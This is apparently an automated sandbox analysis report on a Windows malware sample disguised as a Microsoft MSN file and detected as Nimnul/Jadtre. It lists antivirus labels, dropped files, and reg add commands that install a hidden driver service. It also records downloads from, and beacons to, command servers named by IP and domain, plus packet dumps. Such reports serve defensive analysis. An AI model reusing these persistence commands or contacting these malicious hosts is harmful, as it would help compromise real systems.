Analysis Date2016-02-18 02:19:33
MD5af06ad80a53484cb0ffad33d2a4e460a
SHA1df596e0395212f2912a16b435904db3f059a7e25

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d796e4ff5c4d9c5ca2d1b90272d6d6b8 sha1: 0755e4acb128a57a55d97d2e967825b0a5393d30 size: 65536
Section.data md5: 789f8dbcfc8423c0c1058375d02239bf sha1: f0b25955806641c0017dfcc1eaafd33c8c24a187 size: 4096
Section.rsrc md5: 95c3a4840354bf62ec32d7ce9f5c6cb2 sha1: 2b3cddb7b110e371697ebf99e4de9d01e8674e77 size: 4096
Sectionjc md5: c72db411ce29ea70deb2b99805cdadb7 sha1: 2464aac6678d1b8ccd31f287cb063d6070b4f28e size: 241664
Timestamp2001-07-19 19:30:07
Pdb pathpdb
VersionLegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
PEhash4157d0e438648ccf527723afc9ac097b76a63859
IMPhash6df6e99bae10817058127898c796b82d
AVCA (E-Trust Ino)Win32.VJadtre.3
AVRisingWin32.Yxi.a
AVMcafeeW32/Simfect
AVAvira (antivir)W32/Nimnul.C
AVTwisterVirus.7BF7@1F7AB2@2FF33F.mg
AVAd-AwareWin32.VJadtre.3
AVAlwil (avast)Jadtre-A [Drp]
AVEset (nod32)Win32/Wapomi.AE virus
AVGrisoft (avg)Worm/AutoRun.LY.dropper
AVSymantecW32.Loorp.C!inf
AVFortinetW32/Nimnul.C
AVBitDefenderWin32.VJadtre.3
AVK7Virus ( 001ab60e1 )
AVMicrosoft Security EssentialsVirus:Win32/Jadtre.L
AVMicroWorld (escan)Win32.VJadtre.3
AVMalwareBytesTrojan.FakeMS.ED
AVAuthentiumW32/Nimnul.A
AVEmsisoftWin32.VJadtre.3
AVFrisk (f-prot)W32/Nimnul.A
AVIkarusTrojan-Dropper.Win32.Bototer
AVZillya!Virus.Nimnul.Win32.1
AVKasperskyVirus.Win32.Nimnul.c
AVTrend MicroPE_NIMNUL.A
AVVirusBlokAda (vba32)Virus.Nimnul.d
AVCAT (quickheal)W32.Numnul.C
AVBullGuardWin32.VJadtre.3
AVArcabit (arcavir)Win32.VJadtre.3
AVClamAVW32.Loorp
AVDr. WebWin32.Rmnet.5
AVF-SecureWin32.VJadtre.3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\3f056abc.exe
Creates ProcessC:\3f056abc.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://193.166.255.171:8080/mac.htm?69

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Settings ➝
NULL
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
Creates FileC:\Documents and Settings\NetworkService\Favorites\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\8RSTUVEF\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\HO43W1VI\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\P1PLT26Q\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Favorites\Desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\XYQ0SKUV\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates MutexShell.CMruPidlList
Winsock DNS193.166.255.171

Process
↳ C:\3f056abc.exe

Creates FileC:\WINDOWS\system32\appmgmts.dll
Creates FilePIPE\SfcApi
Creates FileC:\Documents and Settings\Infotmp.txt
Starts ServiceAppMgmt

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
Creates File\Device\00000025
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File\Device\00000002
Creates FileNewAss
Creates FileC:\WINDOWS\system32\c_20178.nls
Creates File\Device\00000029
Creates File\Device\Afd\Endpoint
Creates File\Device\00000027
Creates FileC:\WINDOWS\TEMP\4cdc773a.rar
Creates FileC:\WINDOWS\system32\2F7470CA.sys
Creates File\Device\0000002F
Creates FileC:\WINDOWS\system32\drivers\tcpip.sys
Creates File\Device\00000026
Creates File\Device\0000002A
Creates FileC:\WINDOWS\TEMP\s7bde2ec2.txt
Creates File\Device\00000003
Creates FileC:\Documents and Settings\Infotmp.txt
Creates File\Device\00000028
Creates FileC:\WINDOWS\system32\dmutilio.dll
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\Infotmp.txt
Deletes FileC:\WINDOWS\TEMP\r3a3a02b3.txt
Deletes FileC:\3f056abc.exe
Deletes FileC:\WINDOWS\TEMP\s7bde2ec2.txt
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v ErrorControl /t REG_DWORD /d 1 /f
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v ImagePath /t REG_EXPAND_SZ /d system32\2F7470CA.sys /f
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v Service /t REG_SZ /d 2F7470CA /f
Creates Processreg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt C:\WINDOWS\TEMP\r3a3a02b3.txt
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v Type /t REG_DWORD /d 1 /f
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v ConfigFlags /t REG_DWORD /d 0 /f
Creates Processreg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v Start /t REG_DWORD /d 2 /f
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe http://193.166.255.171:8080/mac.htm?69
Winsock URLhttp://www.ere5453.com:6969/announce?info_hash=%FAz%22%3C%AA%9F%BE%19%0A%19%A5nl%5E%9A%5F%0E%C7a%B5&peer_id=%2DDL1000%2Dw3aalGNx6Ez2&port=9371&uploaded=16384&downloaded=0&left=16384&event=started&compact=1&numwant=100&no_peer_id=1
Winsock URLhttp://vip.ere5453.com:6969/announce?info_hash=%FAz%22%3C%AA%9F%BE%19%0A%19%A5nl%5E%9A%5F%0E%C7a%B5&peer_id=%2DDL1000%2Dw3aalGNx6Ez2&port=9371&uploaded=16384&downloaded=0&left=16384&compact=1&numwant=100&no_peer_id=1

Process
↳ Pid 1212

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝
NULL
Creates FileWMIDataDevice

Process
↳ Pid 1852

Process
↳ Pid 1160

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v Service /t REG_SZ /d 2F7470CA /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}\Service ➝
2F7470CA\\x00

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v ConfigFlags /t REG_DWORD /d 0 /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}\ConfigFlags ➝
NULL

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v Start /t REG_DWORD /d 2 /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\2F7470CA\Start ➝
2

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v Type /t REG_DWORD /d 1 /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\2F7470CA\Type ➝
1

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v ImagePath /t REG_EXPAND_SZ /d system32\2F7470CA.sys /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\2F7470CA\ImagePath ➝
system32\2F7470CA.sys\\x00

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v ErrorControl /t REG_DWORD /d 1 /f

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\2F7470CA\ErrorControl ➝
1

Process
↳ reg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt C:\WINDOWS\TEMP\r3a3a02b3.txt

Creates FileC:\WINDOWS\TEMP\r3a3a02b3.txt

Network Details:

DNSwww.a.shifen.com
Type: A
103.235.46.39
DNSwww.a.shifen.com
Type: A
103.235.46.39
DNS69.nsb927.com
Type: A
193.166.255.171
DNS69.ns792.com
Type: A
54.186.220.79
DNS69.nsvjn987.com
Type: A
192.155.89.148
DNSrouter.bitcomet.net
Type: A
127.0.0.1
DNSrouter.utorrent.com
Type: A
82.221.103.244
DNSrouter.bittorrent.com
Type: A
67.215.246.10
DNSvip.ere5453.com
Type: A
23.253.46.64
DNSwww.ere5453.com
Type: A
23.253.46.64
DNSwww.baidu.com
Type: A
DNS69.ns768.com
Type: A
DNS69.ns529.com
Type: A
DNS69.nsvhn987.com
Type: A
DNS69.ns2275ab.com
Type: A
DNSrouter.bitcomet.com
Type: A
HTTP GEThttp://54.186.220.79:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://54.186.220.79:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://54.186.220.79:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://193.166.255.171:8080/mac.htm?69
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://vip.ere5453.com:6969/announce?info_hash=%FAz%22%3C%AA%9F%BE%19%0A%19%A5nl%5E%9A%5F%0E%C7a%B5&peer_id=%2DDL1000%2Dw3aalGNx6Ez2&port=9371&uploaded=16384&downloaded=0&left=16384&compact=1&numwant=100&no_peer_id=1
User-Agent: dolit
HTTP GEThttp://www.ere5453.com:6969/announce?info_hash=%FAz%22%3C%AA%9F%BE%19%0A%19%A5nl%5E%9A%5F%0E%C7a%B5&peer_id=%2DDL1000%2Dw3aalGNx6Ez2&port=9371&uploaded=16384&downloaded=0&left=16384&event=started&compact=1&numwant=100&no_peer_id=1
User-Agent: dolit
Flows TCP192.168.1.1:1032 ➝ 54.186.220.79:8080
Flows TCP192.168.1.1:1033 ➝ 54.186.220.79:8080
Flows TCP192.168.1.1:1034 ➝ 54.186.220.79:8080
Flows TCP192.168.1.1:1036 ➝ 193.166.255.171:8080
Flows UDP192.168.1.1:9371 ➝ 65.6.163.4:50144
Flows UDP192.168.1.1:9371 ➝ 89.123.188.11:8957
Flows UDP192.168.1.1:9371 ➝ 90.52.108.231:58856
Flows UDP192.168.1.1:9371 ➝ 85.11.66.73:38338
Flows UDP192.168.1.1:9371 ➝ 72.192.20.73:16306
Flows UDP192.168.1.1:9371 ➝ 219.77.13.11:22137
Flows UDP192.168.1.1:9371 ➝ 90.201.190.208:25439
Flows UDP192.168.1.1:9371 ➝ 58.63.39.204:40139
Flows UDP192.168.1.1:9371 ➝ 77.66.224.30:30478
Flows UDP192.168.1.1:9371 ➝ 62.65.208.112:9342
Flows TCP192.168.1.1:1039 ➝ 23.253.46.64:6969
Flows TCP192.168.1.1:1040 ➝ 23.253.46.64:6969
Flows UDP192.168.1.1:9371 ➝ 82.221.103.244:6881
Flows UDP192.168.1.1:9371 ➝ 67.215.246.10:6881

Raw Pcap
0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2035 342e3138 362e3232   .Host: 54.186.22
0x000000d0 (00208)   302e3739 0d0a436f 6e6e6563 74696f6e   0.79..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2035 342e3138 362e3232   .Host: 54.186.22
0x000000d0 (00208)   302e3739 0d0a436f 6e6e6563 74696f6e   0.79..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2035 342e3138 362e3232   .Host: 54.186.22
0x000000d0 (00208)   302e3739 0d0a436f 6e6e6563 74696f6e   0.79..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f6d6163 2e68746d 3f363920   GET /mac.htm?69 
0x00000010 (00016)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000020 (00032)   3a202a2f 2a0d0a55 7365722d 4167656e   : */*..User-Agen
0x00000030 (00048)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000040 (00064)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000050 (00080)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000060 (00096)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000070 (00112)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000080 (00128)   486f7374 3a203139 332e3136 362e3235   Host: 193.166.25
0x00000090 (00144)   352e3137 313a3830 38300d0a 436f6e6e   5.171:8080..Conn
0x000000a0 (00160)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000b0 (00176)   76650d0a 0d0a352e 313b2053 5631290d   ve....5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2035 342e3138 362e3232   .Host: 54.186.22
0x000000d0 (00208)   302e3739 0d0a436f 6e6e6563 74696f6e   0.79..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f616e6e 6f756e63 653f696e   GET /announce?in
0x00000010 (00016)   666f5f68 6173683d 2546417a 25323225   fo_hash=%FAz%22%
0x00000020 (00032)   33432541 41253946 25424525 31392530   3C%AA%9F%BE%19%0
0x00000030 (00048)   41253139 2541356e 6c253545 25394125   A%19%A5nl%5E%9A%
0x00000040 (00064)   35462530 45254337 61254235 26706565   5F%0E%C7a%B5&pee
0x00000050 (00080)   725f6964 3d253244 444c3130 30302532   r_id=%2DDL1000%2
0x00000060 (00096)   44773361 616c474e 7836457a 3226706f   Dw3aalGNx6Ez2&po
0x00000070 (00112)   72743d39 33373126 75706c6f 61646564   rt=9371&uploaded
0x00000080 (00128)   3d313633 38342664 6f776e6c 6f616465   =16384&downloade
0x00000090 (00144)   643d3026 6c656674 3d313633 38342665   d=0&left=16384&e
0x000000a0 (00160)   76656e74 3d737461 72746564 26636f6d   vent=started&com
0x000000b0 (00176)   70616374 3d31266e 756d7761 6e743d31   pact=1&numwant=1
0x000000c0 (00192)   3030266e 6f5f7065 65725f69 643d3120   00&no_peer_id=1 
0x000000d0 (00208)   48545450 2f312e30 0d0a5573 65722d41   HTTP/1.0..User-A
0x000000e0 (00224)   67656e74 3a20646f 6c69740d 0a486f73   gent: dolit..Hos
0x000000f0 (00240)   743a2077 77772e65 72653534 35332e63   t: www.ere5453.c
0x00000100 (00256)   6f6d3a36 3936390d 0a507261 676d613a   om:6969..Pragma:
0x00000110 (00272)   206e6f2d 63616368 650d0a0d 0a742075    no-cache....t u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f616e6e 6f756e63 653f696e   GET /announce?in
0x00000010 (00016)   666f5f68 6173683d 2546417a 25323225   fo_hash=%FAz%22%
0x00000020 (00032)   33432541 41253946 25424525 31392530   3C%AA%9F%BE%19%0
0x00000030 (00048)   41253139 2541356e 6c253545 25394125   A%19%A5nl%5E%9A%
0x00000040 (00064)   35462530 45254337 61254235 26706565   5F%0E%C7a%B5&pee
0x00000050 (00080)   725f6964 3d253244 444c3130 30302532   r_id=%2DDL1000%2
0x00000060 (00096)   44773361 616c474e 7836457a 3226706f   Dw3aalGNx6Ez2&po
0x00000070 (00112)   72743d39 33373126 75706c6f 61646564   rt=9371&uploaded
0x00000080 (00128)   3d313633 38342664 6f776e6c 6f616465   =16384&downloade
0x00000090 (00144)   643d3026 6c656674 3d313633 38342663   d=0&left=16384&c
0x000000a0 (00160)   6f6d7061 63743d31 266e756d 77616e74   ompact=1&numwant
0x000000b0 (00176)   3d313030 266e6f5f 70656572 5f69643d   =100&no_peer_id=
0x000000c0 (00192)   31204854 54502f31 2e300d0a 55736572   1 HTTP/1.0..User
0x000000d0 (00208)   2d416765 6e743a20 646f6c69 740d0a48   -Agent: dolit..H
0x000000e0 (00224)   6f73743a 20766970 2e657265 35343533   ost: vip.ere5453
0x000000f0 (00240)   2e636f6d 3a363936 390d0a50 7261676d   .com:6969..Pragm
0x00000100 (00256)   613a206e 6f2d6361 6368650d 0a0d0a     a: no-cache....


Strings